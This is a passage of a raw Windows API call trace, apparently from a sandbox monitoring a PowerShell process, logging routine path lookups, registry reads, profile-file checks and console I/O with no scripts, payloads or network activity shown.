[6]=0x9e, [7]=0x36))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf6990547, Data2=0x5d87, Data3=0x4f72, Data4=([0]=0x99, [1]=0x86, [2]=0xb8, [3]=0xa, [4]=0x5d, [5]=0x64, [6]=0x19, [7]=0x81))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa04ac92e, Data2=0x31f4, Data3=0x49f9, Data4=([0]=0x9f, [1]=0xab, [2]=0xbf, [3]=0xd1, [4]=0xd5, [5]=0x52, [6]=0xb8, [7]=0x55))) returned 0x0 [0249.221] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x47cce939, Data2=0x5be4, Data3=0x4f90, Data4=([0]=0x9f, [1]=0x1e, [2]=0xaf, [3]=0x6e, [4]=0xf6, [5]=0xf5, [6]=0x79, [7]=0x40))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x2509ccc1, Data2=0xf848, Data3=0x49de, Data4=([0]=0xb7, [1]=0x28, [2]=0x6d, [3]=0x55, [4]=0x85, [5]=0xf0, [6]=0xda, [7]=0xa5))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x98bd839a, Data2=0xdc51, Data3=0x44a8, Data4=([0]=0x88, [1]=0x64, [2]=0x2d, [3]=0x9c, [4]=0x0, [5]=0xd7, [6]=0x99, [7]=0xb8))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x992ed0f4, Data2=0xb766, Data3=0x4bfa, Data4=([0]=0x83, [1]=0xab, [2]=0xb, [3]=0x1d, [4]=0xcc, [5]=0x6, [6]=0x30, [7]=0xc6))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x32532ef, Data2=0x8959, Data3=0x4ae7, Data4=([0]=0x86, [1]=0xc0, [2]=0x54, [3]=0xfc, [4]=0x82, [5]=0xc, [6]=0xb5, [7]=0x57))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7c36743c, Data2=0xcfc4, Data3=0x4259, Data4=([0]=0x90, [1]=0x56, [2]=0xdb, [3]=0x29, [4]=0xfc, [5]=0xdf, [6]=0xa3, [7]=0xa2))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x5b0a8886, Data2=0x13a, Data3=0x4b56, Data4=([0]=0x8d, [1]=0xa1, [2]=0x3d, [3]=0xc5, [4]=0xfe, [5]=0x18, [6]=0xd4, [7]=0x9f))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa81947d0, Data2=0x1d3, Data3=0x40c2, Data4=([0]=0xb0, [1]=0x99, [2]=0xdd, [3]=0x72, [4]=0x96, [5]=0xf6, [6]=0x15, [7]=0xce))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x558b00a4, Data2=0xc798, Data3=0x475b, Data4=([0]=0xba, [1]=0x13, [2]=0xfb, [3]=0x74, [4]=0x66, [5]=0x16, [6]=0xcd, [7]=0x64))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf9339aae, Data2=0x72f1, Data3=0x4f80, Data4=([0]=0xbf, [1]=0x6a, [2]=0x9e, [3]=0xe7, [4]=0x51, [5]=0xa7, [6]=0x9a, [7]=0x82))) returned 0x0 [0249.223] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x3e526f87, Data2=0x25a6, Data3=0x4f7f, Data4=([0]=0xaa, [1]=0x18, [2]=0x6e, [3]=0xef, [4]=0xb7, [5]=0x21, [6]=0x4f, [7]=0xb2))) returned 0x0 [0249.227] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x2d8c8acb, Data2=0x9db3, Data3=0x4ec1, Data4=([0]=0x86, [1]=0x90, [2]=0x0, [3]=0x40, [4]=0x60, [5]=0xe5, [6]=0xcc, [7]=0x68))) returned 0x0 [0249.229] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x10f3b5b, Data2=0x990e, Data3=0x4829, Data4=([0]=0xa2, [1]=0x39, [2]=0x11, [3]=0xc, [4]=0x3d, [5]=0x82, [6]=0x84, [7]=0x48))) returned 0x0 [0249.235] GetLogicalDrives () returned 0x4 [0249.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0249.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0249.236] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.236] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.236] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.240] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.242] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0249.242] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0249.243] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0249.243] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0249.243] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0249.243] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0249.243] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0249.243] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0249.244] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0249.244] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0249.244] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.244] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.244] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0249.244] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0249.246] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.250] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4d2c86c*="Available", lpRawData=0x4d2c794) returned 1 [0249.288] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0249.288] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x7e17300, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.288] CoTaskMemFree (pv=0x7e17300) [0249.289] GetCurrentProcessId () returned 0x13b8 [0249.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e830 | out: phkResult=0x59e830*=0x758) returned 0x0 [0249.290] RegQueryValueExW (in: hKey=0x758, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e850, lpData=0x0, lpcbData=0x59e84c*=0x0 | out: lpType=0x59e850*=0x1, lpData=0x0, lpcbData=0x59e84c*=0x56) returned 0x0 [0249.290] RegQueryValueExW (in: hKey=0x758, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e850, lpData=0x4d32aa8, lpcbData=0x59e84c*=0x56 | out: lpType=0x59e850*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e84c*=0x56) returned 0x0 [0249.290] RegCloseKey (hKey=0x758) returned 0x0 [0249.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.296] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.296] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0249.297] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0249.297] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0249.297] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0249.297] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0249.297] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0249.297] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0249.298] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0249.298] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0249.298] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0249.298] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.298] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.298] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0249.298] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0249.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.492] GetStdHandle (nStdHandle=0xfffffff4) returned 0x1f0 [0249.492] WriteFile (in: hFile=0x1f0, lpBuffer=0x59e988*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x59e98c, lpOverlapped=0x0 | out: lpBuffer=0x59e988*, lpNumberOfBytesWritten=0x59e98c*=0x0, lpOverlapped=0x0) returned 1 [0249.495] GetFileType (hFile=0x1f0) returned 0x3 [0249.535] WriteFile (in: hFile=0x1f0, lpBuffer=0x4d4db9c*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x59e968, lpOverlapped=0x0 | out: lpBuffer=0x4d4db9c*, lpNumberOfBytesWritten=0x59e968*=0x48, lpOverlapped=0x0) returned 1 [0249.535] EtwEventWriteTransfer (RegHandle=0x818fa8, EventDescriptor=0x2e, ActivityId=0x59ea10, RelatedActivityId=0x59e9b0, UserDataCount=0x0, UserData=0x0) returned 0x0 [0249.535] GetCurrentProcessId () returned 0x13b8 [0249.535] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x13b8) returned 0x60c [0249.535] GetProcessTimes (in: hProcess=0x60c, lpCreationTime=0x4d4faf8, lpExitTime=0x4d4fb00, lpKernelTime=0x4d4fb08, lpUserTime=0x4d4fb10 | out: lpCreationTime=0x4d4faf8, lpExitTime=0x4d4fb00, lpKernelTime=0x4d4fb08, lpUserTime=0x4d4fb10) returned 1 [0249.536] CloseHandle (hObject=0x60c) returned 1 [0249.543] CoTaskMemAlloc (cb=0x20c) returned 0x6d05ee0 [0249.543] GetSystemDirectoryW (in: lpBuffer=0x6d05ee0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0249.543] CoTaskMemFree (pv=0x6d05ee0) [0249.543] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0249.543] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0249.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59e7f8) returned 1 [0249.543] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x59e874 | out: lpFileInformation=0x59e874*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0249.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59e7f4) returned 1 [0249.544] GetSystemInfo (in: lpSystemInfo=0x59e8a8 | out: lpSystemInfo=0x59e8a8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0249.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e838 | out: phkResult=0x59e838*=0x60c) returned 0x0 [0249.545] RegQueryValueExW (in: hKey=0x60c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x59e854, lpData=0x0, lpcbData=0x59e850*=0x0 | out: lpType=0x59e854*=0x0, lpData=0x0, lpcbData=0x59e850*=0x0) returned 0x2 [0249.545] RegCloseKey (hKey=0x60c) returned 0x0 [0249.546] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e884 | out: phkResult=0x59e884*=0x60c) returned 0x0 [0249.546] RegQueryValueExW (in: hKey=0x60c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e8a4, lpData=0x0, lpcbData=0x59e8a0*=0x0 | out: lpType=0x59e8a4*=0x1, lpData=0x0, lpcbData=0x59e8a0*=0x56) returned 0x0 [0249.546] RegQueryValueExW (in: hKey=0x60c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e8a4, lpData=0x4d5077c, lpcbData=0x59e8a0*=0x56 | out: lpType=0x59e8a4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e8a0*=0x56) returned 0x0 [0249.546] RegCloseKey (hKey=0x60c) returned 0x0 [0249.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e884 | out: phkResult=0x59e884*=0x60c) returned 0x0 [0249.548] RegQueryValueExW (in: hKey=0x60c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e8a4, lpData=0x0, lpcbData=0x59e8a0*=0x0 | out: lpType=0x59e8a4*=0x1, lpData=0x0, lpcbData=0x59e8a0*=0x56) returned 0x0 [0249.548] RegQueryValueExW (in: hKey=0x60c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e8a4, lpData=0x4d50af4, lpcbData=0x59e8a0*=0x56 | out: lpType=0x59e8a4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e8a0*=0x56) returned 0x0 [0249.548] RegCloseKey (hKey=0x60c) returned 0x0 [0249.562] CoTaskMemAlloc (cb=0x20c) returned 0x6d05ee0 [0249.562] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6d05ee0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0249.562] CoTaskMemFree (pv=0x6d05ee0) [0249.562] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0249.562] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0249.562] CoTaskMemAlloc (cb=0x20c) returned 0x6d05ee0 [0249.562] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6d05ee0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0249.562] CoTaskMemFree (pv=0x6d05ee0) [0249.562] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0249.562] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0249.564] QueryPerformanceCounter (in: lpPerformanceCount=0x59e944 | out: lpPerformanceCount=0x59e944*=34459877154) returned 1 [0249.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0249.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x37, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0249.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59e854) returned 1 [0249.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x59e8d0 | out: lpFileInformation=0x59e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0249.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59e850) returned 1 [0249.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0249.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4c, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0249.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59e854) returned 1 [0249.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x59e8d0 | out: lpFileInformation=0x59e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0249.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59e850) returned 1 [0249.565] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0249.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x38, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x37 [0249.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59e854) returned 1 [0249.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x59e8d0 | out: lpFileInformation=0x59e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0249.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59e850) returned 1 [0249.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0249.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4c [0249.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59e854) returned 1 [0249.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x59e8d0 | out: lpFileInformation=0x59e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0249.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59e850) returned 1 [0249.566] QueryPerformanceCounter (in: lpPerformanceCount=0x59e934 | out: lpPerformanceCount=0x59e934*=34460108113) returned 1 [0249.567] GetCurrentProcessId () returned 0x13b8 [0249.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x59594e8, Length=0x24a28, ResultLength=0x59e8b8 | out: SystemInformation=0x59594e8, ResultLength=0x59e8b8*=0x18e78) returned 0x0 [0249.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0249.907] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0249.912] CoTaskMemAlloc (cb=0x20c) returned 0x6d05ee0 [0249.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d05ee0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0249.912] CoTaskMemFree (pv=0x6d05ee0) [0249.916] GetStdHandle (nStdHandle=0xfffffff6) returned 0x1e8 [0249.917] GetFileType (hFile=0x1e8) returned 0x3 [0249.917] GetConsoleCP () returned 0x1b5 [0249.919] ReadFile (in: hFile=0x1e8, lpBuffer=0x4d89250, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x59e8cc, lpOverlapped=0x0 | out: lpBuffer=0x4d89250*, lpNumberOfBytesRead=0x59e8cc*=0x400, lpOverlapped=0x0) returned 1 [0249.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0249.922] AmsiCloseSession () returned 0xba78b0 [0249.922] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x60c [0249.922] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x814 [0249.922] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x818 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x81c [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x820 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x824 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x828 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x82c [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x830 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x834 [0249.923] CreateEventW 